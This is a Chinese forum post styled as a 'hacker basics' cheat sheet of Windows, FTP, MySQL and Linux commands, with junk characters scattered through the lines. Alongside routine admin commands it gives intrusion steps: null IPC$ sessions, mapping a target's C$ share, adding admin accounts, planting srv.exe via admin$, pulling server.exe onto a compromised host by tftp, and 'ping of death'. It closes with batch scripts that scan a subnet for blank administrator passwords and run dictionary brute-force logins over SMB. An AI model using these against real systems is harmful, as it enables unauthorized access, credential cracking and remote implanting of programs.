黑客基础--最全的DOS命令 黑客基础, 最全的, DOS命令

admin

net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] " " /user:" " 建立IPC空链接 5 [/ O) q3 Z: S) P5 q0 n( g
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] "密码" /user:"用户名" 建立IPC非空链接
  @* [0 v+ X9 m* Y6 r4 C3 vnet use h: [url=file://\\ip\c$]\\ip\c$[/url] "密码" /user:"用户名" 直接登陆后映射对方C：到本地为H: + @2 R% V( C4 @* f' B
net use h: [url=file://\\ip\c$]\\ip\c$[/url] 登陆后映射对方C：到本地为H: . Y. Y: W. r1 Q4 [% [, i- i
net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] /del 删除IPC链接 & j/ e/ w! w0 a
net use h: /del 删除映射对方到本地的为H:的映射
9 r6 L& j1 E* k+ r" O0 Lnet user 用户名　密码　/add 建立用户
$ K+ t5 Y/ r# O3 m  ~6 T4 Ynet user guest /active:yes 激活guest用户
' F5 U2 l+ b& H% _. c, Anet user 查看有哪些用户
  N2 r: p+ G: e( ^, d( vnet user 帐户名 查看帐户的属性
- V1 w+ G+ ?) e& X7 o5 e. Rnet localgroup administrators 用户名 /add 把“用户”添加到管理员中使其具有管理员权限,注意：administrator后加s用复数
7 {) l1 H; v3 J' p! ]. Qnet start 查看开启了哪些服务
' t8 s, P5 X- y) Fnet start 服务名　 开启服务；(如:net start telnet， net start schedule)
5 @! c8 Z$ a' Jnet stop 服务名 停止某服务
# a  D7 d! l( W7 K# T1 V; inet time \\目标ip 查看对方时间
, R, i2 I- }" Lnet time \\目标ip /set 设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息
4 v. X0 i1 v/ x. z  o9 a! Vnet view 查看本地局域网内开启了哪些共享
$ I* u0 v$ e3 _% I% x6 pnet view [url=file://\\ip]\\ip[/url] 查看对方局域网内开启了哪些共享 6 g8 J  f1 {& ~' g: n$ A1 I
net config 显示系统网络设置
0 Q% G, _1 Q/ cnet logoff 断开连接的共享
5 I/ M9 `; \. c- p1 J$ |net pause 服务名 暂停某服务 3 b, E" g( J; j* ~' B1 f( a+ `1 {2 K
net send ip "文本信息" 向对方发信息
, R& m3 }4 \/ m, y( k8 Fnet ver 局域网内正在使用的网络连接类型和信息 ' @! t1 h  v9 d0 [
net share 查看本地开启的共享 " }9 h. T% [+ \2 g# K# @/ ~# A
net share ipc$ 开启ipc$共享 ) I' f  H/ v. k( }# |, F5 O
net share ipc$ /del 删除ipc$共享 : J% H( b1 w& l* P9 T2 v
net share c$ /del 删除C：共享
! x. F) l! j0 l: g" Z4 A# lnet user guest 12345 用guest用户登陆后用将密码改为12345
; h6 g" b2 Y* B" r6 W, C$ [* }net password 密码 更改系统登陆密码 9 q7 P: O7 I: @( i
netstat -a 查看开启了哪些端口,常用netstat -an - |& @3 ?8 g0 f; y8 c- m0 Y
netstat -n 查看端口的网络连接情况，常用netstat -an 8 R- o1 I& |1 H- x7 W
netstat -v 查看正在进行的工作 - {% p8 h7 ]" ~+ f" [5 ~
netstat -p 协议名 例：netstat -p tcq/ip 查看某协议使用情况（查看tcp/ip协议使用情况） 1 B: e; \( `5 t  Z1 Y( ~
netstat -s 查看正在使用的所有协议使用情况 # i8 y% M% |+ U8 l
nbtstat -A ip 对方136到139其中一个端口开了的话，就可查看对方最近登陆的用户名（03前的为用户名）-注意：参数-A要大写 # }# a. r. S; S3 V# s
tracert -参数 ip(或计算机名) 跟踪路由（数据包），参数：“-w数字”用于设置超时间隔。
7 N, m8 M, b. W0 \% y9 mping ip(或域名) 向对方主机发送默认大小为32字节的数据，参数：“-l[空格]数据包大小”；“-n发送数据次数”；“-t”指一直ping。
4 o) q$ V1 F' n( Z" c0 E+ A! Vping -t -l 65550 ip 死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
: m+ U: p) w% n% I7 n( `ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址，ipconfig可用参数“/all”显示全部配置信息
& T- M# s/ n3 H! C% stlist -t 以树行列表显示进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内)
8 ~2 c9 [+ d! Qkill -F 进程名 加-F参数后强制结束某进程(为系统的附加工具，默认是没有安装的，在安装目录的Support/tools文件夹内) ) k; r( ~; W4 f# e4 G7 B1 T1 H& w
del -F 文件名 加-F参数后就可删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件，/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。例如“DEL/AR *.*”表示删除当前目录下所有只读文件，“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件 , g3 G+ r. J; t( R1 X. H9 s3 D
del /S /Q 目录 或用：rmdir /s /Q 目录 /S删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。（二个命令作用相同） 1 _8 j0 B6 k% ?4 a- [! ?1 d
move 盘符\路径\要移动的文件名　存放移动文件的路径\移动后文件名 移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖 . U# o: V& l: U/ `
fc one.txt two.txt > 3st.txt 对比二个文件并把不同之处输出到3st.txt文件中，"> "和"> >" 是重定向命令
- O2 X7 Y, C' O. F" Y) B7 {7 x+ Nat id号 开启已php?name=%D7%A2%B2%E1"  class="t_tag">注册的某个计划任务
4 D% Q& _! l. i" `6 U- |2 wat /delete 停止所有计划任务，用参数/yes则不需要确认就直接停止
# b8 B0 x% P3 J3 K- w1 ^$ L( o# A" Eat id号 /delete 停止某个已注册的计划任务 , H$ ^( X. O. S" ]+ m9 r2 v, P
at 查看所有的计划任务
% V; h: ?! r6 I% v/ f# Dat [url=file://\\ip]\\ip[/url] time 程序名(或一个命令) /r 在某时间运行对方某程序并重新启动计算机
2 x/ a  \+ h$ d! Mfinger username @host 查看最近有哪些用户登陆 : j! x$ S2 l) ?
telnet ip 端口 远和登陆服务器,默认端口为23
& p- v8 G, a" L; {* h- Mopen ip 连接到IP（属telnet登陆后的命令）
7 z! W0 T" {. n: ztelnet 在本机上直接键入telnet 将进入本机的telnet
. i! d5 @" }) _& t7 {! c- n. ^copy 路径\文件名1　路径\文件名2 /y 复制文件1到指定的目录为文件2，用参数/y就同时取消确认你要改写一份现存目录文件 2 T% O3 Y, P9 c& b) A( h
copy c:\srv.exe [url=file://\\ip\admin$]\\ip\admin$[/url] 复制本地c:\srv.exe到对方的admin下
9 _5 a- c/ N5 J2 Ycppy 1st.jpg/b+2st.txt/a 3st.jpg 将2st.txt的内容藏身到1st.jpg中生成3st.jpg新的文件，注：2st.txt文件头要空三排，参数：/b指二进制文件，/a指ASCLL格式文件
4 C3 T4 L2 n4 H0 _' `. fcopy [url=file://\\ip\admin$\svv.exe]\\ip\admin$\svv.exe[/url] c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下的srv.exe文件（所有文件）至本地C：
3 D/ ], \  E( A) O2 g# c  yxcopy 要复制的文件或目录树　目标地址\目录名 复制文件和目录树，用参数/Y将不提示覆盖相同文件
3 |4 G0 s' `2 w# D: q" J6 v. Gtftp -i 自己IP(用肉机作跳板时这用肉机IP) get server.exe c:\server.exe 登陆后，将“IP”的server.exe下载到目标主机c:\server.exe 参数：-i指以二进制模式传送，如传送exe文件时用，如不加-i 则以ASCII模式（传送文本文件模式）进行传送 . Y5 ~+ _  m% V# x  @
tftp -i 对方IP　put c:\server.exe 登陆后，上传本地c:\server.exe至主机 : B. C5 w" d7 s, O
ftp ip 端口 用于上传文件至服务器或进行文件操作，默认端口为21。bin指用二进制方式传送（可执行文件进）；默认为ASCII格式传送(文本文件时) + z% u& L9 p7 v
route print 显示出IP路由，将主要显示网络地址Network addres，子网掩码Netmask，网关地址Gateway addres，接口地址Interface
: \# ?; n4 J+ K! S7 n- Oarp 查看和处理ARP缓存，ARP是名字解析的意思，负责把一个IP解析成一个物理性的MAC地址。arp -a将显示出全部信息 : }0 S/ B& n3 ^' W# u) z% D6 P0 t
start 程序名或命令 /max 或/min 新开一个新窗口并最大化（最小化）运行某程序或命令 2 @: ]; j& O( Q5 _$ H/ e! N! r
mem 查看cpu使用情况 2 t" k# |1 ]' e& Y) u/ R, s0 B( Z
attrib 文件名(目录名) 查看某文件（目录）的属性
3 w. P8 h: _" X2 @6 E4 Y- qattrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件的 存档，只读，系统，隐藏 属性；用＋则是添加为某属性 " d/ H0 j& b) w5 y( \& C
dir 查看文件，参数：/Q显示文件及目录属系统哪个用户，/T:C显示文件创建时间，/T:A显示文件上次被访问时间，/T:W上次被修改时间 3 O' r% k. ^# L" \$ X4 T
date /t 、 time /t 使用此参数即“DATE/T”、“TIME/T”将只显示当前日期和时间，而不必输入新日期和时间
/ O0 s4 E6 Z4 \  u2 W3 }. y% @+ V5 Mset 指定环境变量名称=要指派给变量的字符 设置环境变量 1 ?2 p9 b1 M/ g# S; J2 J% V( D
set 显示当前所有的环境变量
' ]) V+ K3 {" x( `+ ^set p(或其它字符) 显示出当前以字符p(或其它字符)开头的所有环境变量 / Q9 u- Q7 v4 s. j$ ^6 l+ V
pause 暂停批处理程序，并显示出：请按任意键继续.... / f6 l0 [$ w' a% a  {0 x
if 在批处理程序中执行条件处理（更多说明见if命令及变量）
. `6 Q: e. `/ `, t& a+ I. k) d( pgoto 标签 将cmd.exe导向到批处理程序中带标签的行（标签必须单独一行，且以冒号打头，例如：“：start”标签） / _5 \2 e2 O( ], \' D/ F( p- E
call 路径\批处理文件名 从批处理程序中调用另一个批处理程序 （更多说明见call /?）
+ ~( C- g) i7 W! y5 Ffor 对一组文件中的每一个文件执行某个特定命令（更多说明见for命令及变量） + B& q/ _8 ]! i& @
echo on或off 打开或关闭echo，仅用echo不加参数则显示当前echo设置
% L7 e- {. E6 D* j) E  j( Uecho 信息 在屏幕上显示出信息 . w6 K6 x0 U  {
echo 信息 >> pass.txt 将"信息"保存到pass.txt文件中
: x/ G- Q  E! Q5 |& {. vfindstr "Hello" aa.txt 在aa.txt文件中寻找字符串hello 7 \7 d: e0 K, _. j9 |6 b, g2 O( o
find 文件名 查找某文件 , y5 V; `8 b! h8 R9 T
title 标题名字 更改CMD窗口标题名字
& P2 f5 g' P5 T% Kcolor 颜色值 设置cmd控制台前景和背景颜色；0＝黑、1＝蓝、2＝绿、3＝浅绿、4＝红、5＝紫、6＝黄、7=白、8=灰、9=淡蓝、A＝淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白
$ w8 a$ |/ C% ?% g5 ]prompt 名称 更改cmd.exe的显示的命令提示符(把C:\、D:\统一改为：EntSky\ )
+ }) N( F8 R. w2 d8 Iprint 文件名 打印文本文件
4 [/ V. z  j$ y3 |ver 在DOS窗口下显示版本信息 * H; {0 a' r( l& u  X( S( o
winver 弹出一个窗口显示版本信息（内存大小、系统版本、补丁版本、计算机名） * ]$ R& j% l* }1 V& N
format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例：Format D: /FS:NTFS
5 t6 c) ?1 x- g* Y8 imd　目录名 创建目录 ( ]7 a/ a+ b7 C2 j- ?
replace 源文件　要替换文件的目录 替换文件 7 p' @% H) O3 o/ c/ {
ren 原文件名　新文件名 重命名文件名   l7 l" Y& Z$ Q3 P8 O# p" k
tree 以树形结构显示出目录，用参数-f 将列出第个文件夹中文件名称
, y5 `7 R& O. k% ?1 Q4 [type 文件名 显示文本文件的内容   W3 W' ?  w3 U7 A
more 文件名 逐屏显示输出文件
. ]- H+ }! e, @5 V/ ~& Edoskey 要锁定的命令＝字符
) ]0 |; e* O8 e9 c, C) w* fdoskey 要解锁命令= 为DOS提供的锁定命令(编辑命令行，重新调用win2k命令，并创建宏)。如：锁定dir命令：doskey dir=entsky (不能用doskey dir=dir)；解锁：doskey dir= 8 Y  Q5 y; x  r9 z, j; }
taskmgr 调出任务管理器
' h, r8 J; K, l7 ?$ Achkdsk /F D: 检查磁盘D并显示状态报告；加参数/f并修复磁盘上的错误   z/ g) O7 \3 j0 p" [; b. O
tlntadmn telnt服务admn,键入tlntadmn选择3，再选择8,就可以更改telnet服务默认端口23为其它任何端口
1 i! L- M4 {: V6 l" e1 b& pexit 退出cmd.exe程序或目前，用参数/B则是退出当前批处理脚本而不是cmd.exe
6 b8 C( m& J2 M* t& j! n  zpath 路径\可执行文件的文件名 为可执行文件设置一个路径。 * M3 i. q. V  I" L' g0 ^
cmd 启动一个win2K命令解释窗口。参数：/eff、/en 关闭、开启命令扩展；更我详细说明见cmd /? ( z0 s- h/ _& J% |) D( m) x. C
regedit /s 注册表文件名 导入注册表；参数/S指安静模式导入，无任何提示；
- I& U  u" V# g' q/ _! B6 Z! rregedit /e 注册表文件名 导出注册表 ! e  k9 H( n& C7 X! Z6 q# w9 U  R
cacls 文件名　参数 显示或修改文件访问控制列表（ACL）——针对NTFS格式时。参数：/D 用户名:设定拒绝某用户访问；/P 用户名:perm 替换指定用户的访问权限；/G 用户名:perm 赋予指定用户访问权限；Perm 可以是: N 无，R 读取， W 写入， C 更改(写入)，F 完全控制；例：cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问。
, w6 \8 ~, G3 \, ^cacls 文件名 查看文件的访问用户权限列表
7 }9 ]! t. r" \# e( V1 LREM 文本内容 在批处理文件中添加注解 : T6 o& n; B; ]& h. T2 B: E
netsh 查看或更改本地网络配置情况0 l& l' h1 d6 q
IIS服务命令：9 Z8 i/ h0 k& w: L
iisreset /reboot 重启win2k计算机（但有提示系统将重启信息出现） 6 C: s7 q1 ~1 x* ~$ z- Z4 K9 P
iisreset /start或stop 启动（停止）所有Internet服务 ; k- g' q6 R0 A9 i4 o! l
iisreset /restart 停止然后重新启动所有Internet服务
4 d0 V7 n9 w7 \1 S+ ^+ q, Ziisreset /status 显示所有Internet服务状态
# l& y3 w" H. Liisreset /enable或disable 在本地系统上启用（禁用）Internet服务的重新启动
+ P8 h% {0 Q6 ?+ i# Q- r" kiisreset /rebootonerror 当启动、停止或重新启动Internet服务时，若发生错误将重新开机
9 ~. ^( k6 ~; Q; i, giisreset /noforce 若无法停止Internet服务，将不会强制终止Internet服务
0 C1 x8 e: s4 B' S. f8 uiisreset /timeout Val在到达逾时间（秒）时，仍未停止Internet服务，若指定/rebootonerror参数，则电脑将会重新开机。预设值为重新启动20秒，停止60秒，重新开机0秒。
. |% P1 {; |' z; {% ?3 ]9 hFTP 命令： (后面有详细说明内容) 6 `, T; s1 A5 G, X' h- W
ftp的命令行格式为:# ~0 B+ h% i3 r
ftp －v －d －i －n －g[主机名] －v 显示远程服务器的所有响应信息。
; o+ J( T, x& W+ M8 `6 Q7 N8 x－d 使用调试方式。
5 w! j! j- B- K, r5 |8 X－n 限制ftp的自动登录,即不使用.netrc文件。& y. Z* ^5 g; F7 [# T: V: i6 @8 \
－g 取消全局文件名。 ) w" K* u2 A, J! i& L# a% u
help [命令] 或 ？[命令] 查看命令说明 % ]! v0 Z4 F8 q8 h
bye 或 quit 终止主机FTP进程,并退出FTP管理方式.
5 p, {9 j, Q: e  E+ N3 ypwd 列出当前远端主机目录 2 e1 D$ A, \8 x9 v
put 或 send 本地文件名 [上传到主机上的文件名] 将本地一个文件传送至远端主机中 : w8 b  a4 w7 m6 d
get 或 recv [远程主机文件名] [下载到本地后的文件名] 从远端主机中传送至本地主机中 / z& ^7 A& b2 d
mget [remote-files] 从远端主机接收一批文件至本地主机
7 O# a) W4 t$ m" jmput local-files 将本地主机中一批文件传送至远端主机 1 {. [! A2 [1 v# W: x
dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录中的文件.如果有本地文件,就将结果写至本地文件
/ a' `+ h- p  w5 j+ D% i; aascii 设定以ASCII方式传送文件(缺省值)
3 X  Y0 D. _8 f% Mbin 或 image 设定以二进制方式传送文件 2 j5 P% M. F+ v; X9 t
bell 每完成一次文件传送,报警提示
& G* y* A7 D+ a1 S) Zcdup 返回上一级目录
$ X1 {0 S. k9 L1 j4 [close 中断与远程服务器的ftp会话(与open对应)
* l$ R& A7 Q0 y- f( aopen host[port] 建立指定ftp服务器连接,可指定连接端口 & r: \% j* {  |: g" u( |
delete 删除远端主机中的文件 ; ^# G; v6 h* [0 O1 a- ^' u
mdelete [remote-files] 删除一批文件 " Y1 J9 ?6 V1 h, A
mkdir directory-name 在远端主机中建立目录
. i* p4 M4 v; `* P# z5 Wrename [from] [to] 改变远端主机中的文件名 6 N$ b2 n; a+ d+ o
rmdir directory-name 删除远端主机中的目录 ( k0 p: C2 ~, d! h( M  ]
status 显示当前FTP的状态 ! n) `: J9 I0 V
system 显示远端主机系统类型
3 H# t- {! Q1 ]+ ^% m, k: Duser user-name [password] [account] 重新以别的用户名登录远端主机 ! {& z0 L! q6 W9 ?. d
open host [port] 重新建立一个新的连接   C/ [9 F7 a( [# }1 z0 j
prompt 交互提示模式
- r5 ~0 h( y9 w1 Bmacdef 定义宏命令
% j5 C. l+ A  x8 flcd 改变当前本地主机的工作目录,如果缺省,就转到当前用户的HOME目录 8 L2 s0 |; q& r+ A7 [- t
chmod 改变远端主机的文件权限 * q% [2 L- I/ O1 U+ v
case 当为ON时,用MGET命令拷贝的文件名到本地机器中,全部转换为小写字母 1 N: _* k" L) s- q! w. Y) [
cd remote－dir 进入远程主机目录
8 l; [2 V; f) xcdup 进入远程主机目录的父目录 6 o! Z2 O+ m6 N# y, X
! 在本地机中执行交互shell，exit回到ftp环境,如!ls＊.zip 1 I0 d6 e' n/ V' f
MYSQL 命令：
. d2 K; @# i$ r3 w4 nmysql -h主机地址 -u用户名 －p密码 连接MYSQL;如果刚安装好MYSQL，超级用户root是没有密码的。
0 m$ W$ M+ H3 _（例：mysql -h110.110.110.110 -Uroot -P123456 ' N9 h1 f) ]; Y# I- `. }* x/ z
注:u与root可以不用加空格，其它也一样）
" C! j( L3 s, lexit 退出MYSQL
! y( K: v% l! ~) Tmysqladmin -u用户名 -p旧密码 password 新密码 修改密码 6 h4 m# Y6 `& l/ ?5 Z
grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户。（注意：和上面不同，下面的因为是MYSQL环境中的命令，所以后面都带一个分号作为命令结束符） ; u( W+ @" j2 p: H+ \3 {3 W
show databases; 显示数据库列表。刚开始时才两个数据库：mysql和test。mysql库很重要它里面有MYSQL的系统信息，我们改密码和新增用户，实际上就是用这个库进行操作。 $ t* [2 K" x5 g3 X- P: u: ^
use mysql；* O2 c% V' u, K  w/ ~3 u# [/ S
show tables; 显示库中的数据表 ) k8 k1 x+ c5 L' r% K9 v7 D: k
describe 表名; 显示数据表的结构
" n' _% b) K2 Gcreate database 库名; 建库
) U0 g; w8 a: W7 d5 A# r- Iuse 库名；) o/ z) n$ J: O) u8 h
create table 表名 (字段设定列表)； 建表 : I- Q0 P8 d% q# Q5 o# G6 J
drop database 库名;
4 k4 X  G$ c7 I4 W2 tdrop table 表名； 删库和删表 + ~9 ^5 f9 B( G- t$ E& l
delete from 表名; 将表中记录清空 ; A0 c2 F( A4 Y1 x
select * from 表名; 显示表中的记录 & X* P5 |! t1 A, K# H
mysqldump --opt school>school.bbb 备份数据库：（命令在DOS的[url=file://\\mysql\\bin]\\mysql\\bin[/url]目录下执行）;注释:将数据库school备份到school.bbb文件，school.bbb是一个文本文件，文件名任取，打开看看你会有新发现。
3 D: Y$ {9 l5 j! E1 B* S6 Z/ swin2003系统下新增命令（实用部份）：
( v0 ~/ I3 m" v6 g( y7 Lshutdown /参数 关闭或重启本地或远程主机。. U* n; r5 j6 _6 u
参数说明：/S 关闭主机，/R 重启主机， /T 数字 设定延时的时间，范围0～180秒之间， /A取消开机，/M //IP 指定的远程主机。
0 F; [- X* g7 ?" n8 O# C* V; l* d例：shutdown /r /t 0 立即重启本地主机（无延时） 6 _% J+ G+ f* Z$ A1 |! Z8 G0 p- b
taskill /参数 进程名或进程的pid 终止一个或多个任务和进程。! G. l" V6 V+ `! o) m. }
参数说明：/PID 要终止进程的pid,可用tasklist命令获得各进程的pid，/IM 要终止的进程的进程名，/F 强制终止进程，/T 终止指定的进程及他所启动的子进程。
8 V: `8 ?: ?. Z( v/ }5 ~tasklist 显示当前运行在本地和远程主机上的进程、服务、服务各进程的进程标识符(PID)。: m8 ?* C; i! d6 ~/ Q9 v/ @. {
参数说明：/M 列出当前进程加载的dll文件，/SVC 显示出每个进程对应的服务，无参数时就只列出当前的进程# c1 Z8 ]1 p0 j+ q- _. e& [
Linux系统下基本命令： 要区分大小写+ N9 s* l, h  S. X$ {0 b8 g0 N
uname 显示版本信息（同win2K的 ver）
. S" d9 n% w4 j0 `, D4 h# c- @dir 显示当前目录文件,ls -al 显示包括隐藏文件（同win2K的 dir） 6 p4 K0 X  a+ L& x
pwd 查询当前所在的目录位置
+ g' @. r+ S2 R3 W3 Icd cd　..回到上一层目录，注意cd 与..之间有空格。cd　/返回到根目录。
# L1 `6 h9 {9 \; u8 U; Dcat 文件名 查看文件内容
9 ~( ?/ k* o+ ?% ~+ m  Q5 z: ?cat >abc.txt 往abc.txt文件中写上内容。
8 ?; O$ w: Z% n6 M: D  }' D1 Fmore 文件名 以一页一页的方式显示一个文本文件。 3 ~8 l$ Y/ l5 I
cp 复制文件
" z. m" Z7 w+ S8 t# ]: |' cmv 移动文件 % Z& ~3 D* ^" E5 |
rm 文件名 删除文件，rm -a 目录名删除目录及子目录
8 g! y; G% G8 y) ^& R1 L+ kmkdir 目录名 建立目录 - u, U. |! w& B- O) I
rmdir 删除子目录，目录内没有文档。
: _, Q: q( r* q7 H" Zchmod 设定档案或目录的存取权限 . g7 b- {9 D0 R- @) S
grep 在档案中查找字符串 , y9 z7 V; j! s7 M# g2 ~0 f
diff 档案文件比较
% v4 |; h& s& Wfind 档案搜寻 " Q( R: C& S& J3 u- W9 l
date 现在的日期、时间
; J# D2 ~& b+ J, Q1 \1 L+ @% Rwho 查询目前和你使用同一台机器的人以及Login时间地点
, j* U: A2 n5 q( v5 h! |+ b; w7 Jw 查询目前上机者的详细资料
  s: c& M1 X6 V4 k' owhoami 查看自己的帐号名称 9 k" V$ \" v* K' Z: ^) D# b
groups 查看某人的Group 2 G9 K$ y. q' {) w9 K& o
passwd 更改密码
* L0 G# G0 i3 O6 T5 \history 查看自己下过的命令 ' {0 O: j# F- A# W, E* v* b+ u
ps 显示进程状态
& |3 f5 I: m5 l' Skill 停止某进程 3 b: d; u, i* c0 u5 r  I$ T
gcc 黑客通常用它来编译C语言写的文件
, T( w9 a* u" T& J( Msu 权限转换为指定使用者
3 v6 |6 y7 A1 e$ L! F7 }' v4 H4 t) @1 Mtelnet IP telnet连接对方主机（同win2K），当出现bash$时就说明连接成功。
# d% V% M: n+ w5 d& [ftp ftp连接上某服务器（同win2K
, ~8 c0 l  C# V附：批处理命令与变量: a* ?9 P4 E" h, D7 Q1 ?% `! R
1：for命令及变量 基本格式： + y3 N) q( _- J6 E% A
FOR /参数 %variable IN (set) DO command [command_parameters] %variable:指定一个单一字母可替换的参数，如：%i ，而指定一个变量则用：%%i ，而调用变量时用：%i% ，变量是区分大小写的（%i 不等于 %I）。0 E' L& D' l2 I. _. \& @9 F& p7 t* l
批处理每次能处理的变量从%0—%9共10个，其中%0默认给批处理文件名使用，%1默认为使用此批处理时输入的的第一个值，同理：%2—%9指输入的第2-9个值；例：net use [url=file://\\ip\ipc$]\\ip\ipc$[/url] pass /user:user 中ip为%1,pass为%2 ,user为%3
; d3 R8 M, d  {# |" X(set):指定一个或一组文件，可使用通配符，如：(D:\user.txt)和(1 1 254)(1 -1 254),{“(1 1 254)”第一个"1"指起始值，第二个"1"指增长量，第三个"254"指结束值，即：从1到254；“(1 -1 254)”说明：即从254到1}  Q/ V/ r' v- i- \8 ~( c. f
command：指定对第个文件执行的命令，如：net use命令；如要执行多个命令时，命令这间加：& 来隔开
0 A8 F% h# H3 Z( `0 X  }command_parameters：为特定命令指定参数或命令行开关) n, i) O2 k# z& q
IN (set)：指在(set)中取值；DO command ：指执行command! C) ^" T. K% x. V$ k
参数：/L 指用增量形式{(set)为增量形式时}；/F 指从文件中不断取值，直到取完为止{(set)为文件时，如(d:\pass.txt)时}。
" f* \* L3 b6 a$ u! x用法举例：
: j6 X  C+ X/ F; R4 X@echo off
- w1 p6 N0 q, \! qecho 用法格式：test.bat *.*.* > test.txt 3 |5 V, h7 S0 W* b2 Q
for /L %%G in (1 1 254) do echo %1.%%G >>test.txt & net use [url=file://\\%1.%%G]\\%1.%%G[/url] /user:administrator | find "命令成功完成" >>test.txt - ~8 W" B. s  m5 `6 t6 Z' o
存为test.bat 说明：对指定的一个C类网段的254个IP依次试建立administrator密码为空的IPC$连接，如果成功就把该IP存在test.txt中。& b- z: {& [' O, M/ L6 \
/L指用增量形式（即从1-254或254-1）；输入的IP前面三位：*.*.*为批处理默认的 %1；%%G 为变量(ip的最后一位）；& 用来隔开echo 和net use 这二个命令；| 指建立了ipc$后，在结果中用find查看是否有"命令成功完成"信息；%1.%%G 为完整的IP地址；(1 1 254) 指起始值，增长量，结止值。
8 E4 @. u+ ]. P! X@echo off
6 M/ V6 X% u9 d4 yecho 用法格式：ok.bat ip $ y; v1 f. r/ R" ?, e( D7 G* _
FOR /F %%i IN (D:\user.dic) DO smb.exe %1 %%i D:\pass.dic 200 : I5 M  K* t6 H  X9 I& l
存为：ok.exe 说明：输入一个IP后，用字典文件d:\pass.dic来暴解d:\user.dic中的用户密码，直到文件中值取完为止。%%i为用户名；%1为输入的IP地址（默认）。3 z4 _' x& M- O+ q* t7 B4 d, \
2：if命令及变量 基本格式： ; v- Q) p+ Q( a3 W
IF [not] errorlevel 数字 命令语句 如果程序运行最后返回一个等于或大于指定数字的退出编码，指定条件为“真”。
1 C. n& H8 e- h7 h+ V7 L0 x" y0 \; l8 O例：IF errorlevel 0 命令 指程序执行后返回的值为0时，就值行后面的命令；IF not errorlevel 1 命令指程序执行最后返回的值不等于1，就执行后面的命令。/ K; q0 R6 X2 T: {  ?
0 指发现并成功执行（真）；1 指没有发现、没执行（假）。
( B: A9 E: w5 J6 j- ^2 YIF [not] 字符串1==字符串2 命令语句 如果指定的文本字符串匹配（即：字符串1 等于 字符串2），就执行后面的命令。
0 t$ c0 g8 Y, a+ \" g例：“if "%2%"=="4" goto start”指：如果输入的第二个变量为4时，执行后面的命令（注意：调用变量时就%变量名%并加" "）
% E3 g4 Z9 Z. ZIF [not] exist 文件名 命令语句 如果指定的文件名存在，就执行后面的命令。
9 y* A# R6 t( B3 U- |/ X例：“if not nc.exe goto end”指：如果没有发现nc.exe文件就跳到":end"标签处。
3 p2 {0 h2 |) @0 N8 W) FIF [not] errorlevel 数字 命令语句 else 命令语句或 IF [not] 字符串1==字符串2 命令语句 else 命令语句或 IF [not] exist 文件名 命令语句 else 命令语句 加上：else 命令语句后指：当前面的条件不成立时，就指行else后面的命令。注意：else 必须与 if 在同一行才有效。 当有del命令时需把del命令全部内容用< >括起来，因为del命令要单独一行时才能执行，用上< >后就等于是单独一行了；例如：“if exist test.txt. <del test.txt.> else echo test.txt.missing ”，注意命令中的“.”